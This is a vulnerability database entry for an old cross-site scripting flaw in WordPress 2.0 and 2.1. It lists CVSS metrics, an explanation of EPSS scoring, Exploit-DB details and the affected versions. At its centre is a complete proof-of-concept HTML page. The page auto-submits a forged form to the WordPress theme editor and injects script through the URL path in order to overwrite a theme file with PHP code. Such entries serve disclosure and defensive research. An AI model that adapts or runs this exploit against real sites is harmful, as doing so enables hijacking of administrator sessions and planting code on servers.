Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.3 |
|
AV:N/AC:M/Au:N/C:N/I:P/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 29754
Publication date : 2007-03-18 23h00 +00:00
Author : Alexander Concha
EDB Verified : Yes
source: https://www.securityfocus.com/bid/23027/info
WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head>
<title>Wordpress XSS PoC</title>
</head>
<body id="main">
<form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
<p>
<textarea name="newcontent" rows="8" cols="40"><?php echo "Owned! " . date('F d, Y'); ?></textarea>
</p>
<p>
<input type="hidden" name="action" value="update" />
<input type="hidden" name="file" value="wp-content/themes/default/index.php" />
</p>
</form>
<script type="text/javascript">
// <![CDATA[
document.forms[0].submit();
// ]]>
</script>
</body>
</html>
Products Mentioned
Configuraton 0
Wordpress>>Wordpress >> Version 2.0
Wordpress>>Wordpress >> Version 2.0.1
Wordpress>>Wordpress >> Version 2.0.2
Wordpress>>Wordpress >> Version 2.0.3
Wordpress>>Wordpress >> Version 2.0.4
Wordpress>>Wordpress >> Version 2.0.5
Wordpress>>Wordpress >> Version 2.0.6
Wordpress>>Wordpress >> Version 2.0.7
Wordpress>>Wordpress >> Version 2.0.10
Wordpress>>Wordpress >> Version 2.0.10_rc1
Wordpress>>Wordpress >> Version 2.1
Wordpress>>Wordpress >> Version 2.1.1
Wordpress>>Wordpress >> Version 2.1.2
Wordpress>>Wordpress >> Version 2.1.3_rc1
References